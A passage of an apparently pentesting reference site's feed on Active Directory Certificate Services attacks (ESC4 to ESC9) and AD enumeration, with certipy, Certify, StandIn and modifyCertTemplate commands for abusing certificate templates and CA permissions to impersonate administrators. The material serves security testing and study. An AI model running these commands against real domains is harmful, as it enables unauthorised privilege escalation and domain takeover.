&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;req&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;corp.local/john:Passw0rd!@ca.corp.local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;corp-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;User&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-on-behalf-of&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;corp\administrator&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-pfx&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;john.pfx&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;</description></item><item><title>Active Directory - Certificate ESC4</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc04/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc04/</guid><description>&lt;h2 id="esc4---access-control-vulnerabilities" class="anchored-heading"&gt;ESC4 - Access Control Vulnerabilities&lt;a class="heading-anchor" href="#esc4---access-control-vulnerabilities" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Enabling the &lt;code&gt;mspki-certificate-name-flag&lt;/code&gt; flag for a template that allows for domain authentication, allow attackers to &amp;ldquo;push a misconfiguration to a template leading to ESC1 vulnerability&lt;/p&gt;
&lt;/blockquote&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Search for &lt;code&gt;WriteProperty&lt;/code&gt; with value &lt;code&gt;00000000-0000-0000-0000-000000000000&lt;/code&gt; using &lt;a href="https://github.com/fortalice/modifyCertTemplate"&gt;modifyCertTemplate&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;modifyCertTemplate&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-k&lt;/span&gt; &lt;span class="n"&gt;-no-pass&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-get-acl&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Add the &lt;code&gt;ENROLLEE_SUPPLIES_SUBJECT&lt;/code&gt; (ESS) flag to perform ESC1&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python3&lt;/span&gt; &lt;span class="n"&gt;modifyCertTemplate&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;local&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-k&lt;/span&gt; &lt;span class="n"&gt;-no-pass&lt;/span&gt; &lt;span class="n"&gt;-template&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-add&lt;/span&gt; &lt;span class="n"&gt;enrollee_supplies_subject&lt;/span&gt; &lt;span class="n"&gt;-property&lt;/span&gt; &lt;span class="nb"&gt;mspki-Certificate&lt;/span&gt;&lt;span class="n"&gt;-Name-Flag&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Add/remove ENROLLEE_SUPPLIES_SUBJECT flag from the WebServer template. &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;C:&lt;/span&gt;&lt;span class="p"&gt;\&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;StandIn&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-adcs&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-filter&lt;/span&gt; &lt;span class="n"&gt;WebServer&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-ess&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="n"&gt;-add&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Perform ESC1 and then restore the value&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC5</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc05/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc05/</guid><description>&lt;h2 id="esc5---vulnerable-pki-object-access-control" class="anchored-heading"&gt;ESC5 - Vulnerable PKI Object Access Control&lt;a class="heading-anchor" href="#esc5---vulnerable-pki-object-access-control" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Escalate the privileges from &lt;strong&gt;Domain Administrator&lt;/strong&gt; in the child domain into &lt;strong&gt;Enterprise Administrator&lt;/strong&gt; at the forest root.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Add new templates to the &amp;ldquo;Certificate&amp;rdquo; Templates container&lt;/li&gt;
&lt;li&gt;&amp;ldquo;WRITE&amp;rdquo; access to the &lt;code&gt;pKIEnrollmentService&lt;/code&gt; object&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation - Access Control&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Use &lt;code&gt;PsExec&lt;/code&gt; to launch &lt;code&gt;mmc&lt;/code&gt; as SYSTEM on the child DC: &lt;code&gt;psexec.exe /accepteula -i -s mmc&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Connect to &amp;ldquo;Configuration naming context&amp;rdquo; &amp;gt; &amp;ldquo;Certificate Template&amp;rdquo; container&lt;/li&gt;
&lt;li&gt;Open &lt;code&gt;certsrv.msc&lt;/code&gt; as SYSTEM and duplicate an existing template&lt;/li&gt;
&lt;li&gt;Edit the properties of the template to:
&lt;ul&gt;
&lt;li&gt;Granting enroll rights to a principal we control in the child domain.&lt;/li&gt;
&lt;li&gt;Including Client Authentication in the Application Policies.&lt;/li&gt;
&lt;li&gt;Allowing SANs in certificate requests.&lt;/li&gt;
&lt;li&gt;Not enabling manager approval or authorized signatures.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Publish the certificate template to the CA
&lt;ul&gt;
&lt;li&gt;Publish by adding the template to the list in &lt;code&gt;certificateTemplate&lt;/code&gt; property of &lt;code&gt;CN=Services&lt;/code&gt;&amp;gt;&lt;code&gt;CN=Public Key Services&lt;/code&gt;&amp;gt;&lt;code&gt;CN=Enrollment Services&lt;/code&gt;&amp;gt;&lt;code&gt;pkiEnrollmentService&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;Finally use the ESC1 vulnerability introduced in the duplicated template to issue a certificate impersonating an Enterprise Administrator.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Exploitation - Golden Certificate&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC6</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc06/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc06/</guid><description>&lt;h2 id="esc6---editf_attributesubjectaltname2" class="anchored-heading"&gt;ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2&lt;a class="heading-anchor" href="#esc6---editf_attributesubjectaltname2" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;If this flag is set on the CA, any request (including when the subject is built from Active Directory) can have user defined values in the subject alternative name.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Use &lt;a href="https://github.com/GhostPack/Certify"&gt;Certify.exe&lt;/a&gt; to check for &lt;strong&gt;UserSpecifiedSAN&lt;/strong&gt; flag state which refers to the &lt;code&gt;EDITF_ATTRIBUTESUBJECTALTNAME2&lt;/code&gt; flag.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Certify&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;cas&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Request a certificate for a template and add an altname, even though the default &lt;code&gt;User&lt;/code&gt; template doesn&amp;rsquo;t normally allow to specify alternative names&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC7</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc07/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc07/</guid><description>&lt;h2 id="esc7---vulnerable-certificate-authority-access-control" class="anchored-heading"&gt;ESC7 - Vulnerable Certificate Authority Access Control&lt;a class="heading-anchor" href="#esc7---vulnerable-certificate-authority-access-control" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Exploitation&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;Detect CAs that allow low privileged users the &lt;code&gt;ManageCA&lt;/code&gt; or &lt;code&gt;Manage Certificates&lt;/code&gt; permissions&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Certify&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;find&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;vulnerable&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# or&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;find&lt;/span&gt; &lt;span class="n"&gt;-enabled&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# add &amp;#34;Manage Certificates&amp;#34; privilege&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certipy&lt;/span&gt; &lt;span class="n"&gt;ca&lt;/span&gt; &lt;span class="n"&gt;-ca&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;DOMAIN-CA&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-username&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="nv"&gt;@domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;local&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;GoldCrown&lt;/span&gt; &lt;span class="n"&gt;-add-officer&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;-dc-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt; &lt;span class="n"&gt;-target-ip&lt;/span&gt; &lt;span class="mf"&gt;10.10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;10&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;11&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Change the CA settings to enable the SAN extension for all the templates under the vulnerable CA (ESC6)&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Certify&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;setconfig&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;enablesan&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;restart&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Request the certificate with the desired SAN.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Certify&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;request&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;template&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;User&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;altname&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;super&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;adm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;Grant approval if required or disable the approval requirement&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC8</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc08/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc08/</guid><description>&lt;h2 id="web-enrollment-endpoint" class="anchored-heading"&gt;Web Enrollment Endpoint&lt;a class="heading-anchor" href="#web-enrollment-endpoint" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Probe the endpoint by sending a request to:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-text" data-lang="text"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;http://&amp;lt;webserver-ip&amp;gt;/certsrv/certfnsp.aspx
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A valid enrollment endpoint will respond with NTLM/Negotiate authentication headers (&lt;code&gt;WWW-Authenticate&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;The Web Enrollment role does &lt;strong&gt;not&lt;/strong&gt; need to run on the CA itself; it can be hosted on any IIS server configured for delegation to the target CA.&lt;/p&gt;
&lt;p&gt;In high-traffic environments, Web Enrollment is commonly deployed on a &lt;strong&gt;dedicated IIS server&lt;/strong&gt; to offload traffic from the CA.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate ESC9</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc09/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-esc09/</guid><description>&lt;h2 id="esc9---no-security-extension" class="anchored-heading"&gt;ESC9 - No Security Extension&lt;a class="heading-anchor" href="#esc9---no-security-extension" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Requirements&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;StrongCertificateBindingEnforcement&lt;/code&gt; set to &lt;code&gt;1&lt;/code&gt; (default) or &lt;code&gt;0&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Certificate contains the &lt;code&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/code&gt; flag in the &lt;code&gt;msPKI-Enrollment-Flag&lt;/code&gt; value&lt;/li&gt;
&lt;li&gt;Certificate specifies &lt;code&gt;Any Client&lt;/code&gt; authentication EKU&lt;/li&gt;
&lt;li&gt;&lt;code&gt;GenericWrite&lt;/code&gt; over any account A to compromise any account B&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Scenario&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&amp;lt;John@corp.local&amp;gt; has &lt;strong&gt;GenericWrite&lt;/strong&gt; over &amp;lt;Jane@corp.local&amp;gt;, and we want to compromise &amp;lt;Administrator@corp.local&amp;gt;.
&amp;lt;Jane@corp.local&amp;gt; is allowed to enroll in the certificate template ESC9 that specifies the &lt;strong&gt;CT_FLAG_NO_SECURITY_EXTENSION&lt;/strong&gt; flag in the &lt;strong&gt;msPKI-Enrollment-Flag&lt;/strong&gt; value.&lt;/p&gt;</description></item><item><title>Active Directory - Certificate Services</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-certificate-services/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adcs-certificate-services/</guid><description>&lt;p&gt;Active Directory Certificate Services (AD CS) is a Microsoft Windows server role that provides a public key infrastructure (PKI). It allows you to create, manage, and distribute digital certificates, which are used to secure communication and transactions across a network.&lt;/p&gt;
&lt;h2 id="adcs-enumeration" class="anchored-heading"&gt;ADCS Enumeration&lt;a class="heading-anchor" href="#adcs-enumeration" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;NetExec:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;netexec&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt; &lt;span class="n"&gt;domain&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;lab&lt;/span&gt; &lt;span class="n"&gt;-u&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt; &lt;span class="n"&gt;-M&lt;/span&gt; &lt;span class="n"&gt;adcs&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;ldapsearch:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ldapsearch&lt;/span&gt; &lt;span class="n"&gt;-H&lt;/span&gt; &lt;span class="n"&gt;ldap&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;dc_IP&lt;/span&gt; &lt;span class="n"&gt;-x&lt;/span&gt; &lt;span class="n"&gt;-LLL&lt;/span&gt; &lt;span class="n"&gt;-D&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;CN=&amp;lt;user&amp;gt;,OU=Users,DC=domain,DC=local&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-w&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;password&amp;gt;&amp;#39;&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="s2"&gt;&amp;#34;CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=CONFIGURATION,DC=domain,DC=local&amp;#34;&lt;/span&gt; &lt;span class="n"&gt;dNSHostName&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;certutil:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certutil&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;exe&lt;/span&gt; &lt;span class="n"&gt;-config&lt;/span&gt; &lt;span class="p"&gt;-&lt;/span&gt; &lt;span class="n"&gt;-ping&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;certutil&lt;/span&gt; &lt;span class="n"&gt;-dump&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="certificate-enrollment" class="anchored-heading"&gt;Certificate Enrollment&lt;a class="heading-anchor" href="#certificate-enrollment" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;DNS required (&lt;code&gt;CT_FLAG_SUBJECT_ALT_REQUIRE_DNS&lt;/code&gt; or &lt;code&gt;CT_FLAG_SUBJECT_ALT_REQUIRE_DOMAIN_DNS&lt;/code&gt;): only principals with their &lt;code&gt;dNSHostName&lt;/code&gt; attribute set can enroll.&lt;/p&gt;</description></item><item><title>Active Directory - Enumeration</title><link>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-enumerate/</link><pubDate>Sat, 25 Jul 2026 18:47:21 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/internal/active-directory/ad-adds-enumerate/</guid><description>&lt;h2 id="using-bloodhound" class="anchored-heading"&gt;Using BloodHound&lt;a class="heading-anchor" href="#using-bloodhound" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Use the appropriate data collector to gather information for &lt;strong&gt;BloodHound&lt;/strong&gt; or &lt;strong&gt;BloodHound Community Edition (CE)&lt;/strong&gt; across various platforms.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/BloodHoundAD/AzureHound"&gt;BloodHoundAD/AzureHound&lt;/a&gt; for Azure Active Directory&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/BloodHoundAD/SharpHound"&gt;BloodHoundAD/SharpHound&lt;/a&gt; for local Active Directory (C# collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/FalconForceTeam/SOAPHound"&gt;FalconForceTeam/SOAPHound&lt;/a&gt; for local Active Directory (C# collector using ADWS)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/g0h4n/RustHound-CE"&gt;g0h4n/RustHound-CE&lt;/a&gt; for local Active Directory (Rust collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/NH-RED-TEAM/RustHound"&gt;NH-RED-TEAM/RustHound&lt;/a&gt; for local Active Directory (Rust collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/fox-it/BloodHound.py"&gt;fox-it/BloodHound.py&lt;/a&gt; for local Active Directory (Python collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/coffeegist/bofhound"&gt;coffeegist/bofhound&lt;/a&gt; for local Active Directory (Generate BloodHound compatible JSON from logs written by ldapsearch BOF, pyldapsearch and Brute Ratel&amp;rsquo;s LDAP Sentinel)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/c3c/ADExplorerSnapshot.py"&gt;c3c/ADExplorerSnapshot.py&lt;/a&gt; for local Active Directory (Generate BloodHound compatible JSON from AD Explorer snapshot)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/CrowdStrike/sccmhound"&gt;CrowdStrike/sccmhound&lt;/a&gt; for local Active Directory (C# collector using Microsoft Configuration Manager)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SpecterOps/MSSQLHound"&gt;SpecterOps/MSSQLHound&lt;/a&gt; for MSSQL attack paths (BloodHound OpenGraph PowerShell collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SpecterOps/SnowHound"&gt;SpecterOps/SnowHound&lt;/a&gt; for Snowflake attack paths (BloodHound OpenGraph PowerShell collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SpecterOps/GitHound"&gt;SpecterOps/GitHound&lt;/a&gt; for GitHub attack paths (BloodHound OpenGraph PowerShell collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/SpecterOps/1PassHound"&gt;SpecterOps/1PassHound&lt;/a&gt; for 1Password attack paths (BloodHound OpenGraph PowerShell collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/TheSleekBoyCompany/AnsibleHound"&gt;TheSleekBoyCompany/AnsibleHound&lt;/a&gt; for Ansible WorX and Ansible Tower attack paths (BloodHound OpenGraph Go collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/p0dalirius/sharehound"&gt;p0dalirius/sharehound&lt;/a&gt; - for Network Shares attack paths (BloodHound OpenGraph Python collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/C0KERNEL/SecretHound"&gt;C0KERNEL/SecretHound&lt;/a&gt; - for secrets (BloodHound OpenGraph Python collector)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/F41zK4r1m/GCP-Hound"&gt;F41zK4r1m/GCP-Hound&lt;/a&gt; - for GCP attack path (BloodHound OpenGraph Python collector)&lt;/li&gt;
